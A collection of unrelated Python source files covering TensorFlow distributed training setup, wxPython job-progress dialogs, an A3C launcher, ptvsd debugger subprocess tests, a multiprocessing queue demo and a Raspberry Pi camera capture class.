def _run_ps_server(current_host, hosts, tf_config):
"""After the training finishes, parameter servers won't stop running because server.join() has an infinite loop.
That is a known issue: https://github.com/tensorflow/ecosystem/issues/19
The solution below, runs the parameter server in a secondary thread while the main thread pings the master waiting
for it to stop responding. After that, it will exit the application gracefully given that python threads cannot be
stopped
Args:
current_host: (str) name of the current host
hosts: list (str) list of all the hostnames
tf_config: dict (str) tensorflow config map
Returns:
"""
def start_ps_server(current_host, hosts, tf_config):
cluster_spec = tf.train.ClusterSpec(tf_config['cluster'])
task_index = hosts.index(current_host)
server = tf.train.Server(cluster_spec, job_name='ps', task_index=task_index)
server.join()
t = Thread(target=start_ps_server, args=(current_host, hosts, tf_config))
t.start()
def _get_default_training_params(env):
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--training_steps', type=int, default=1000)
my_parser.add_argument('--evaluation_steps', type=int, default=100)
hp = env.argparse_hyperparameters(my_parser)
return hp.training_steps, hp.evaluation_steps
def _get_master(tf_config):
return tf_config['cluster']['master'][0][:-5]
def _get_trainer_class():
# We used the Experiment API in tf.contrib.learn initially. It's not
# officially supported, and it's not working properly with TF 1.6, so
# we've switched to using tf.estimator.train_and_evaluate instead for
# versions 1.6 and up. However, we still want to use the old API for
# 1.4 and 1.5, since the new API isn't fully backwards compatible.
major, minor, patch = tf.__version__.split('.')
if major != '1':
raise ValueError('We only support TensorFlow 1.x.y currently.')
if minor in ['4', '5']:
import tf_container.experiment_trainer
return tf_container.experiment_trainer.Trainer
import tf_container.trainer_optimizer
return tf_container.trainer_optimizer.TrainerBayesOptimizer
def _get_checkpoint_dir(env):
if 'checkpoint_path' not in env.hyperparameters:
return env.model_dir
checkpoint_path = env.hyperparameters['checkpoint_path']
# If this is not part of a tuning job, then we can just use the specified checkpoint path
if '_tuning_objective_metric' not in env.hyperparameters:
return checkpoint_path
job_name = env.job_name
# If the checkpoint path already matches the format 'job_name/checkpoints', then we don't
# need to worry about checkpoints from multiple training jobs being saved in the same location
if job_name is None or checkpoint_path.endswith(os.path.join(job_name, 'checkpoints')):
return checkpoint_path
else:
return os.path.join(checkpoint_path, job_name, 'checkpoints')
def train():
env = cs.TrainingEnvironment()
checkpoint_dir = _get_checkpoint_dir(env)
train_steps = env.hyperparameters.get('training_steps', 1000)
eval_steps = env.hyperparameters.get('evaluation_steps', 100)
# https://github.com/tensorflow/tensorflow/issues/15868
# The default request timeout for S3, within the C++ SDK, is 3 seconds, which times out when
# saving checkpoints of larger sizes.
os.environ['S3_REQUEST_TIMEOUT_MSEC'] = str(env.hyperparameters.get('s3_checkpoint_save_timeout', 60000))
if env.user_script_archive.lower().startswith('s3://'):
env.download_user_module()
env.pip_install_requirements()
customer_script = env.import_user_module()
trainer_class = _get_trainer_class()
train_wrapper = trainer_class(customer_script=customer_script,
current_host=env.current_host,
hosts=env.hosts,
train_steps=train_steps,
eval_steps=eval_steps,
input_channels=env.channel_dirs,
model_path=checkpoint_dir,
output_path=env.output_dir,
customer_params=env.hyperparameters)
tf_config = train_wrapper.build_tf_config()
# only creating a parameter servers for distributed runs
if len(env.hosts) > 1:
_run_ps_server(env.current_host, env.hosts, tf_config)
save_tf_config_env_var(tf_config)
best_model_path = train_wrapper.train()
# only the master should export the model at the end of the execution
if checkpoint_dir != env.model_dir and train_wrapper.task_type == 'master' and train_wrapper.saves_training():
serve.export_saved_model(best_model_path, env.model_dir)
if train_wrapper.task_type != 'master':
_wait_until_master_is_down(_get_master(tf_config))
|
process_control.py
|
# TODO more comprehensive tests
from __future__ import division
from __future__ import absolute_import # XXX is this necessary?
from wx.lib.agw import pyprogress
import wx
from libtbx import thread_utils
from libtbx import runtime_utils
from libtbx import easy_pickle
from libtbx import easy_run
from libtbx.utils import Sorry, Abort, download_progress
import threading
import random
import locale
import math
import os
JOB_START_ID = wx.NewId()
LOG_UPDATE_ID = wx.NewId()
CALLBACK_ID = wx.NewId()
JOB_EXCEPTION_ID = wx.NewId()
JOB_KILLED_ID = wx.NewId()
JOB_COMPLETE_ID = wx.NewId()
JOB_PAUSE_ID = wx.NewId()
JOB_RESUME_ID = wx.NewId()
DOWNLOAD_COMPLETE_ID = wx.NewId()
DOWNLOAD_INCREMENT_ID = wx.NewId()
class SubprocessEvent (wx.PyEvent) :
event_id = None
def __init__ (self, data, **kwds) :
self.data = data
self.__dict__.update(kwds)
wx.PyEvent.__init__(self)
self.SetEventType(self.event_id)
class JobStartEvent (SubprocessEvent) :
event_id = JOB_START_ID
class LogEvent (SubprocessEvent) :
event_id = LOG_UPDATE_ID
class JobExceptionEvent (SubprocessEvent) :
event_id = JOB_EXCEPTION_ID
class JobKilledEvent (SubprocessEvent) :
event_id = JOB_KILLED_ID
class JobCompleteEvent (SubprocessEvent) :
event_id = JOB_COMPLETE_ID
class CallbackEvent (SubprocessEvent) :
event_id = CALLBACK_ID
class JobPauseEvent (SubprocessEvent) :
event_id = JOB_PAUSE_ID
class JobResumeEvent (SubprocessEvent) :
event_id = JOB_RESUME_ID
class DownloadCompleteEvent (SubprocessEvent) :
event_id = DOWNLOAD_COMPLETE_ID
class DownloadIncrementEvent (SubprocessEvent) :
event_id = DOWNLOAD_INCREMENT_ID
def setup_stdout_logging_event (window, OnPrint) :
window.Connect(-1, -1, LOG_UPDATE_ID, OnPrint)
def setup_process_gui_events (
window,
OnStart=None,
OnPrint=None,
OnUpdate=None,
OnExcept=None,
OnAbort=None,
OnComplete=None,
OnPause=None,
OnResume=None) :
if OnStart is not None :
assert hasattr(OnStart, "__call__")
window.Connect(-1, -1, JOB_START_ID, OnStart)
if OnPrint is not None :
assert hasattr(OnPrint, "__call__")
window.Connect(-1, -1, LOG_UPDATE_ID, OnPrint)
if OnUpdate is not None :
assert hasattr(OnUpdate, "__call__")
window.Connect(-1, -1, CALLBACK_ID, OnUpdate)
if OnExcept is not None :
assert hasattr(OnExcept, "__call__")
window.Connect(-1, -1, JOB_EXCEPTION_ID, OnExcept)
if OnAbort is not None :
assert hasattr(OnAbort, "__call__")
window.Connect(-1, -1, JOB_KILLED_ID, OnAbort)
if OnComplete is not None :
assert hasattr(OnComplete, "__call__")
window.Connect(-1, -1, JOB_COMPLETE_ID, OnComplete)
if OnPause is not None :
assert hasattr(OnPause, "__call__")
window.Connect(-1, -1, JOB_PAUSE_ID, OnPause)
if OnResume is not None :
assert hasattr(OnResume, "__call__")
window.Connect(-1, -1, JOB_RESUME_ID, OnResume)
class event_agent (object) :
def __init__ (self, window, **kwds) :
self.window = window
self._kwds = dict(kwds)
self.__dict__.update(kwds)
def get_kwds (self) :
return self._kwds
def callback_start (self, data) :
kwds = self.get_kwds()
event = JobStartEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_stdout (self, data) :
kwds = self.get_kwds()
event = LogEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_error (self, error, traceback_info) :
kwds = self.get_kwds()
event = JobExceptionEvent((error, traceback_info), **kwds)
wx.PostEvent(self.window, event)
def callback_abort (self) :
kwds = self.get_kwds()
event = JobKilledEvent(None, **kwds)
wx.PostEvent(self.window, event)
def callback_final (self, result) :
kwds = self.get_kwds()
event = JobCompleteEvent(result, **kwds)
wx.PostEvent(self.window, event)
def callback_other (self, data) :
kwds = self.get_kwds()
event = CallbackEvent(data, **kwds)
wx.PostEvent(self.window, event)
def callback_pause (self) :
kwds = self.get_kwds()
event = JobPauseEvent(None, **kwds)
wx.PostEvent(self.window, event)
def callback_resume (self) :
kwds = self.get_kwds()
event = JobResumeEvent(None, **kwds)
wx.PostEvent(self.window, event)
# simplified for when the window is really the app object
class background_event_agent (event_agent) :
def callback_stdout (self, data) :
pass
def callback_other (self, data) :
pass
class detached_process (runtime_utils.detached_process_client) :
def __init__ (self, params, proxy) :
runtime_utils.detached_process_client.__init__(self, params)
self.proxy = proxy
def callback_start (self, data) :
self.proxy.callback_start(data)
def callback_stdout (self, data) :
self.proxy.callback_stdout(data)
def callback_other (self, data) :
self.proxy.callback_other(data)
def callback_abort (self) :
self.proxy.callback_abort()
def callback_final (self, result) :
self.proxy.callback_final(result)
def callback_error (self, error, traceback_info) :
self.proxy.callback_error(error, traceback_info)
def callback_pause (self) :
self.proxy.callback_pause()
def callback_resume (self) :
self.proxy.callback_resume()
def start (self) :
pass
# this just adds event posting callbacks to the original class
class process_with_gui_callbacks (thread_utils.process_with_callbacks) :
def __init__ (self, proxy, target, args=(), kwargs={}, buffer_stdout=True) :
thread_utils.process_with_callbacks.__init__(self,
target = target,
args=args,
kwargs=kwargs,
callback_stdout = proxy.callback_stdout,
callback_final = proxy.callback_final,
callback_err = proxy.callback_error,
callback_abort = proxy.callback_abort,
callback_other = proxy.callback_other,
callback_pause = proxy.callback_pause,
callback_resume = proxy.callback_resume,
buffer_stdout = buffer_stdout)
def set_job (self, job) :
pass
def purge_files (self) :
pass
class simple_gui_process (process_with_gui_callbacks) :
def __init__ (self, window, target, args=(), kwargs={}) :
# XXX fix for phenix gui - is this necessary?
proxy = event_agent(window, project_id=None, job_id=None)
process_with_gui_callbacks.__init__(self,
proxy=proxy,
target=target,
args=args,
kwargs=kwargs,
buffer_stdout=True)
class ThreadProgressDialog (pyprogress.PyProgress) :
def __init__ (self, parent, title, message) :
pyprogress.PyProgress.__init__(self, parent, -1, title, message,
agwStyle=wx.PD_ELAPSED_TIME|wx.PD_APP_MODAL)
self.SetGaugeProportion(0.15)
self.SetGaugeSteps(50)
self.SetGaugeBackground(wx.Colour(235, 235, 235))
self.SetFirstGradientColour(wx.Colour(235,235,235))
self.SetSecondGradientColour(wx.Colour(120, 200, 255))
class download_file_basic (object) :
def __init__ (self, window, dl_func, args) :
assert isinstance(window, wx.EvtHandler)
assert hasattr(dl_func, "__call__")
assert (isinstance(args, list) or isinstance(args, tuple))
self.window = window
window.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self.dl_func = dl_func
self.args = args
self.t = threading.Thread(target=self.run)
self.t.start()
def run (self) :
try :
result = self.dl_func(self.args)
except Exception, e :
result = (None, str(e))
finally :
wx.PostEvent(self.window, DownloadCompleteEvent(result))
return result
def OnComplete (self, event) :
if isinstance(event.data, basestring) :
wx.MessageBox(message="File downloaded to %s" % event.data)
else :
wx.MessageBox(message="Error downloading file: %s" % event.data[1],
caption="Download error", style=wx.ICON_ERROR)
self.t.join()
class DownloadProgressDialog (wx.ProgressDialog, download_progress) :
"""
Dialog for displaying download progress. The actual download (not
implemented here) should be run in a separate thread, with a reasonable
chunk size, and call download_progress.increment() as each new chunk is
downloaded.
"""
def __init__ (self, parent, title, message) :
download_progress.__init__(self)
wx.ProgressDialog.__init__(self, parent=parent,
title=title,
message=message,
style=wx.PD_ELAPSED_TIME|wx.PD_CAN_ABORT|wx.PD_AUTO_HIDE,
maximum=100)
self.Connect(-1, -1, DOWNLOAD_INCREMENT_ID, self.OnIncrement)
self.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self._continue = True
def show_progress (self) :
if (not self._continue) :
return False
locale.setlocale(locale.LC_ALL, 'en_US')
pct = self.percent_finished()
msg = "%s/%s KB downloaded" % (
locale.format("%d", self.n_kb_elapsed, grouping=True),
locale.format("%d", self.n_kb_total, grouping=True))
evt = DownloadIncrementEvent(data=(pct, msg))
wx.PostEvent(self, evt)
return self._continue
def OnIncrement (self, event) :
(cont, skip) = self.Update(value=event.data[0], newmsg=event.data[1])
self._continue = cont
def OnComplete (self, event) :
self.Hide()
self.Close()
# FIXME destroying the dialog crashes wxPython 2.9.5/osx-coocoa
def complete (self) :
evt = DownloadCompleteEvent(data=None)
wx.PostEvent(self, evt)
class BackgroundDownloadDialog (pyprogress.PyProgress, download_progress) :
"""
Placeholder for downloads which block the child thread; will pulse
continuously but not show changing status.
"""
def __init__ (self, parent, title, message) :
download_progress.__init__(self)
pyprogress.PyProgress.__init__(self, parent, -1, title, message,
agwStyle=wx.PD_ELAPSED_TIME|wx.PD_CAN_ABORT|wx.PD_AUTO_HIDE)
self.SetGaugeProportion(0.15)
self.SetGaugeSteps(100)
self.SetGaugeBackground(wx.Colour(235, 235, 235))
self.SetFirstGradientColour(wx.Colour(235,235,235))
self.SetSecondGradientColour(wx.Colour(120, 200, 255))
self.Connect(-1, -1, DOWNLOAD_COMPLETE_ID, self.OnComplete)
self._continue = True
def show_progress (self) :
if (not self._continue) :
return False
return self._continue
def OnComplete (self, event) :
self.Hide()
self.Close()
def complete (self) :
evt = DownloadCompleteEvent(data=None)
wx.PostEvent(self, evt)
def run_function_as_thread_in_dialog (parent, thread_function, title, message) :
dlg = ThreadProgressDialog(None, title, message)
t = thread_utils.simple_task_thread(thread_function, dlg)
t.start()
while True :
if t.is_complete() or t.exception_raised() :
#dlg.Destroy()
dlg.Hide()
break
else :
dlg.UpdatePulse()
wx.MilliSleep(30)
dlg.Destroy()
wx.SafeYield()
if t.exception_raised() :
raise RuntimeError("An exception occurred while running this process: %s" %
t.get_error())
return t.return_value
# TODO
class ProcessDialog (wx.Dialog) :
def __init__ (self, parent, message, caption, callback=None) :
wx.Dialog.__init__(self,
parent=parent,
title=caption,
style=wx.RAISED_BORDER|wx.CAPTION)
self.callback = callback
self.process = None
self._error = None
self._aborted = False
szr = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(szr)
szr2 = wx.BoxSizer(wx.VERTICAL)
szr.Add(szr2, 1, wx.ALL, 5)
msg_txt = wx.StaticText(self, -1, message)
msg_txt.Wrap(400)
szr2.Add(msg_txt, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5)
self.gauge = wx.Gauge(parent=self, size=(300,-1))
self.gauge.SetRange(100)
szr2.Add(self.gauge, 1, wx.ALL|wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL, 5)
abort_btn = wx.Button(parent=self,
label="Abort")
self.Bind(wx.EVT_BUTTON, self.OnAbort, abort_btn)
szr2.Add(abort_btn, 0, wx.ALL|wx.ALIGN_CENTER_HORIZONTAL, 5)
self.SetMinSize((300,100))
szr.Fit(self)
self.Centre(wx.BOTH)
def run (self, process):
self.process = process
self._timer = wx.Timer(owner=self)
self.Bind(wx.EVT_TIMER, self.OnTimer)
self._timer.Start(100)
self.process.start()
self.gauge.Pulse()
return self.ShowModal()
def OnTimer (self, event) :
if hasattr(self.process,'update'):
self.process.update()
self.gauge.Pulse()
def OnAbort (self, event) :
self.process.abort()
self._aborted = True
self.EndModal(wx.ID_CANCEL)
def OnError (self, event) :
self._error = event.data
self.EndModal(wx.ID_CANCEL)
def exception_raised (self) :
return (self._error is not None)
def was_aborted (self) :
return (self._aborted)
def handle_error (self) :
if isinstance(self._error, Exception) :
raise event.data
elif isinstance(self._error, tuple) :
exception, traceback = self._error
if (isinstance(exception, Sorry)) :
raise Sorry(str(exception))
raise RuntimeError("""\
Error in subprocess!
Original error: %s
Original traceback:
%s""" % (str(exception), traceback))
else :
raise Sorry("error in child process: %s" % str(self._error))
# finally :
# self.EndModal(wx.ID_CANCEL)
def OnComplete (self, event) :
try :
if (self.callback is not None) :
self.callback(event.data)
finally :
self._result = event.data
self._timer.Stop()
self.EndModal(wx.ID_OK)
def get_result (self) :
return getattr(self, "_result", None)
def run_function_as_process_in_dialog (
parent,
thread_function,
title,
message,
callback=None,
project_id=None,
job_id=None) :
dlg = ProcessDialog(
parent=parent,
message=message,
caption=title,
callback=callback)
setup_process_gui_events(
window=dlg,
OnExcept=dlg.OnError,
OnComplete=dlg.OnComplete)
cb = event_agent(dlg, project_id=project_id, job_id=job_id)
p = thread_utils.process_with_callbacks(
target=thread_function,
callback_final=cb.callback_final,
callback_err=cb.callback_error,
buffer_stdout=True,
sleep_after_start=1)
result = None
abort = False
if (dlg.run(p) == wx.ID_OK) :
result = dlg.get_result()
elif dlg.exception_raised() :
dlg.handle_error()
elif (dlg.was_aborted()) :
abort = True
wx.CallAfter(dlg.Destroy)
if (abort) :
raise Abort()
return result
# TODO this is awful, needs to be re-thought
def run_function_as_detached_process_in_dialog (
parent,
thread_function,
title,
message,
tmp_dir,
callback=None,
project_id=None,
job_id=None) :
if (tmp_dir is None) :
tmp_dir = os.getcwd()
params = runtime_utils.process_master_phil.extract()
params.tmp_dir = tmp_dir
if (job_id is None) :
job_id = str(os.getpid()) + "_" + str(int(random.random() * 1000))
params.prefix = str(job_id)
target = runtime_utils.detached_process_driver(target=thread_function)
run_file = os.path.join(tmp_dir, "libtbx_run_%s.pkl" % job_id)
easy_pickle.dump(run_file, target)
params.run_file = run_file
eff_file = os.path.join(tmp_dir, "libtbx_run_%s.eff" % job_id)
runtime_utils.write_params(params, eff_file)
dlg = ProcessDialog(
parent=parent,
message=message,
caption=title,
callback=callback)
setup_process_gui_events(
window=dlg,
OnExcept=dlg.OnError,
OnAbort=dlg.OnAbort,
OnComplete=dlg.OnComplete)
agent = event_agent(
window=dlg,
project_id=project_id,
job_id=job_id)
process = detached_process(params, proxy=agent)
cb = event_agent(dlg, project_id=project_id, job_id=job_id)
easy_run.call("libtbx.start_process \"%s\" &" % eff_file)
result = None
abort = False
if (dlg.run(process) == wx.ID_OK) :
result = dlg.get_result()
elif dlg.exception_raised() :
dlg.handle_error()
elif (dlg.was_aborted()) :
abort = True
wx.CallAfter(dlg.Destroy)
if (abort) :
raise Abort()
return result
########################################################################
# XXX regression testing utilities
def test_function_1 (*args, **kwds) :
n = 0
for i in range(25000) :
x = math.sqrt(i)
print x
n += x
return n
def test_function_2 (*args, **kwds) :
n = 0
for i in range(100000) :
x = math.sqrt(i)
n += x
return n
def test_function_3 (*args, **kwds) :
raise RuntimeError("This is a test!")
|
main.py
|
from __future__ import print_function
import argparse
import os
import sys
import torch
import torch.optim as optim
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
from envs import create_atari_env
from model import ActorCritic
from train import train
from test import test
import my_optim
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99, metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00, metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4, metavar='N',
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20, metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=10000, metavar='M',
help='maximum length of an episode (default: 10000)')
parser.add_argument('--env-name', default='PongDeterministic-v3', metavar='ENV',
help='environment to train on (default: PongDeterministic-v3)')
parser.add_argument('--no-shared', default=False, metavar='O',
help='use an optimizer without shared momentum.')
parser.add_argument('--num-skips', type=int, default=3, metavar='SKIP',
help='how many frame skip allowed')
parser.add_argument('--model-name', default='def',
help='for saving the model')
parser.add_argument('--load-dir',
help='load model from path')
parser.add_argument('--testing', default=False,
help='to run model')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
args = parser.parse_args()
print(args)
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space, args.num_skips)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
if args.load_dir:
filename = args.load_dir
print('==> loading checkpoint {}'.format(filename))
checkpoint = torch.load(filename)
shared_model.load_state_dict(checkpoint)
print('==> loaded checkpoint {}'.format(filename))
processes = []
p = mp.Process(target=test, args=(args.num_processes, args, shared_model))
p.start()
processes.append(p)
if not args.testing:
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_multiproc.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
import ptvsd
from ptvsd.common import messaging
from tests import debug
from tests.debug import runners
from tests.patterns import some
@pytest.fixture(params=[runners.launch, runners.attach_by_socket["api"]])
def run(request):
return request.param
@pytest.mark.parametrize(
"start_method",
[""]
if sys.version_info < (3,)
else ["spawn"]
if sys.platform == "win32"
else ["spawn", "fork"],
)
def test_multiprocessing(pyfile, target, run, start_method):
if start_method == "spawn" and sys.platform != "win32":
pytest.skip("https://github.com/microsoft/ptvsd/issues/1887")
@pyfile
def code_to_debug():
import debug_me # noqa
import multiprocessing
import os
import sys
def parent(q, a):
from debug_me import backchannel
print("spawning child")
p = multiprocessing.Process(target=child, args=(q, a))
p.start()
print("child spawned")
q.put("child_pid?")
what, child_pid = a.get()
assert what == "child_pid"
backchannel.send(child_pid)
q.put("grandchild_pid?")
what, grandchild_pid = a.get()
assert what == "grandchild_pid"
backchannel.send(grandchild_pid)
assert backchannel.receive() == "continue"
q.put("exit!")
p.join()
def child(q, a):
print("entering child")
assert q.get() == "child_pid?"
a.put(("child_pid", os.getpid()))
print("spawning child of child")
p = multiprocessing.Process(target=grandchild, args=(q, a))
p.start()
p.join()
print("leaving child")
def grandchild(q, a):
print("entering grandchild")
assert q.get() == "grandchild_pid?"
a.put(("grandchild_pid", os.getpid()))
assert q.get() == "exit!"
print("leaving grandchild")
if __name__ == "__main__":
start_method = sys.argv[1]
if start_method != "":
multiprocessing.set_start_method(start_method)
q = multiprocessing.Queue()
a = multiprocessing.Queue()
try:
parent(q, a)
finally:
q.close()
a.close()
with debug.Session() as parent_session:
parent_backchannel = parent_session.open_backchannel()
with run(parent_session, target(code_to_debug, args=[start_method])):
pass
expected_child_config = dict(parent_session.config)
expected_child_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
child_config = parent_session.wait_for_next_event("ptvsd_attach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_grandchild_config = dict(child_session.config)
expected_grandchild_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
grandchild_config = child_session.wait_for_next_event("ptvsd_attach")
assert grandchild_config == expected_grandchild_config
with debug.Session(grandchild_config) as grandchild_session:
with grandchild_session.start():
pass
parent_backchannel.send("continue")
def test_subprocess(pyfile, target, run):
@pyfile
def child():
import os
import sys
assert "ptvsd" in sys.modules
from debug_me import backchannel, ptvsd
backchannel.send(os.getpid())
backchannel.send(ptvsd.__file__)
backchannel.send(sys.argv)
@pyfile
def parent():
import debug_me # noqa
import os
import subprocess
import sys
argv = [sys.executable, sys.argv[1], "--arg1", "--arg2", "--arg3"]
env = os.environ.copy()
process = subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
process.wait()
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
with run(parent_session, target(parent, args=[child])):
pass
expected_child_config = dict(parent_session.config)
expected_child_config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"host": some.str,
"port": some.int,
}
)
child_config = parent_session.wait_for_next_event("ptvsd_attach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
child_pid = backchannel.receive()
assert child_pid == child_config["subProcessId"]
assert str(child_pid) in child_config["name"]
ptvsd_file = backchannel.receive()
assert ptvsd_file == ptvsd.__file__
child_argv = backchannel.receive()
assert child_argv == [child, "--arg1", "--arg2", "--arg3"]
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
@pytest.mark.parametrize(
"start_method", [runners.launch, runners.attach_by_socket["cli"]]
)
def test_autokill(pyfile, start_method, run_as):
@pyfile
def child():
import debug_me # noqa
while True:
pass
@pyfile
def parent():
import os
import subprocess
import sys
from debug_me import backchannel
argv = [sys.executable, sys.argv[1]]
env = os.environ.copy()
subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
backchannel.receive()
with debug.Session(start_method, backchannel=True) as parent_session:
parent_backchannel = parent_session.backchannel
expected_exit_code = (
some.int if parent_session.start_method.method == "launch" else 0
)
parent_session.expected_exit_code = expected_exit_code
parent_session.configure(run_as, parent, subProcess=True, args=[child])
parent_session.start_debugging()
with parent_session.attach_to_next_subprocess() as child_session:
child_session.start_debugging()
if parent_session.start_method.method == "launch":
# In launch scenario, terminate the parent process by disconnecting from it.
try:
parent_session.request("disconnect")
except messaging.NoMoreMessages:
# Can happen if ptvsd drops connection before sending the response.
pass
parent_session.wait_for_disconnect()
else:
# In attach scenario, just let the parent process run to completion.
parent_backchannel.send(None)
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
def test_argv_quoting(pyfile, start_method, run_as):
@pyfile
def args():
import debug_me # noqa
args = [ # noqa
r"regular",
r"",
r"with spaces" r'"quoted"',
r'" quote at start',
r'quote at end "',
r'quote in " the middle',
r'quotes "in the" middle',
r"\path with\spaces",
r"\path\with\terminal\backslash" + "\\",
r"backslash \" before quote",
]
@pyfile
def parent():
import debug_me # noqa
import sys
import subprocess
from args import args
child = sys.argv[1]
subprocess.check_call([sys.executable] + [child] + args)
@pyfile
def child():
from debug_me import backchannel
import sys
from args import args as expected_args
backchannel.send(expected_args)
actual_args = sys.argv[1:]
backchannel.send(actual_args)
with debug.Session(start_method, backchannel=True) as session:
backchannel = session.backchannel
session.configure(run_as, parent, args=[child])
session.start_debugging()
expected_args = backchannel.receive()
actual_args = backchannel.receive()
assert expected_args == actual_args
@pytest.mark.skip("Needs refactoring to use the new debug.Session API")
def test_echo_and_shell(pyfile, run_as, start_method):
"""
Checks https://github.com/microsoft/ptvsd/issues/1548
"""
@pyfile
def code_to_run():
import debug_me # noqa
import sys
import subprocess
import os
if sys.platform == "win32":
args = ["dir", "-c", "."]
else:
args = ["ls", "-c", "-la"]
p = subprocess.Popen(
args,
shell=True,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
cwd=os.path.dirname(os.path.abspath(__file__)),
)
stdout, _stderr = p.communicate()
if sys.version_info[0] >= 3:
stdout = stdout.decode("utf-8")
if "code_to_run.py" not in stdout:
raise AssertionError(
'Did not find "code_to_run.py" when listing this dir with subprocess. Contents: %s'
% (stdout,)
)
with debug.Session(start_method) as session:
session.configure(run_as, code_to_run, subProcess=True)
session.start_debugging()
|
dishes.py
|
import multiprocessing as mp
def washer(dishes, output):
for dish in dishes:
print('Washing', dish, 'dish')
output.put(dish)
def dryer(input):
while True:
dish = input.get()
print('Drying', dish, 'dish')
input.task_done()
dish_queue = mp.JoinableQueue()
dryer_proc = mp.Process(target=dryer, args=(dish_queue,))
dryer_proc.daemon = True
dryer_proc.start()
dishes = ['salad', 'bread', 'entree', 'dessert']
washer(dishes, dish_queue)
dish_queue.join()
|
glider_camera.py
|
import os
import time
import logging
import picamera
from PIL import Image
from datetime import datetime
from threading import Thread
from . import glider_config
LOG = logging.getLogger("glider.%s" % __name__)
class GliderCamera(object):
threads = []
threadAlive = False
def __init__(self,
low_quality_interval=15,
high_quality_interval=60,
photo_path=None):
LOG.info("Camera init")
if not photo_path:
photo_path = glider_config.get("camera", "data_dir")
self.photo_path = photo_path
self.last_low_pic = time.time()
self.last_high_pic = time.time()
self.low_quality_interval = low_quality_interval
self.high_quality_interval = high_quality_interval
self.video_requested = 0
def get_cam(self, cam_type):
camera = picamera.PiCamera()
camera.sharpness = 0
camera.contrast = 0
camera.brightness = 50
camera.saturation = 0
camera.image_effect = 'none'
camera.color_effects = None
camera.rotation = 0
camera.hflip = False
camera.vflip = False
camera.video_stabilization = True
camera.exposure_compensation = 0
camera.exposure_mode = 'auto'
camera.meter_mode = 'average'
camera.awb_mode = 'auto'
camera.crop = (0.0, 0.0, 1.0, 1.0)
if cam_type == "high":
camera.resolution = (1296, 972)
if cam_type == "low":
camera.resolution = (640, 480)
if cam_type == "video":
camera.resolution = (1296,972)
return camera
def _take_video(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "video_%s.h264" % timestamp)
LOG.info("Creating (%ss) video at %s" % (self.video_requested, out_path))
with self.get_cam("video") as camera:
LOG.info("Starting recording")
camera.start_recording(out_path)
camera.wait_recording(self.video_requested)
LOG.info("Stopping recording")
camera.stop_recording()
camera.close()
return out_path
def take_video(self, seconds):
self.video_requested = seconds
def take_low_pic(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "low_%s.jpg" % timestamp)
with self.get_cam("low") as camera:
camera.capture("/tmp/precompressed.jpg", format="jpeg", quality=40)
image = Image.open("/tmp/precompressed.jpg")
image.convert('P', palette=Image.ADAPTIVE, colors=200).convert("RGB").save(
out_path, "JPEG", quality=20, optimize=True
)
camera.close()
return out_path
def take_high_pic(self):
timestamp = datetime.now().strftime("%H%M%S%f")
out_path = os.path.join(self.photo_path, "high_%s.png" % timestamp)
with self.get_cam("high") as camera:
camera.capture(out_path, format="png")
camera.close()
return out_path
def take_pictures(self):
while self.threadAlive:
now = time.time()
try:
if self.video_requested:
out_path = self._take_video()
self.video_requested = 0
LOG.debug("Created video: %s" % out_path)
if now - self.last_low_pic > self.low_quality_interval:
out_path = self.take_low_pic()
self.last_low_pic = now
LOG.debug("Created low pic: %s" % out_path)
if now - self.last_high_pic > self.high_quality_interval:
out_path = self.take_high_pic()
self.last_high_pic = now
LOG.debug("Created high pic: %s" % out_path)
except:
LOG.error("Camera can't initialize, try again later")
time.sleep(1)
def start(self):
cameraThread = Thread( target=self.take_pictures, args=() )
self.threadAlive = True
LOG.info("Starting up Camera thread now")
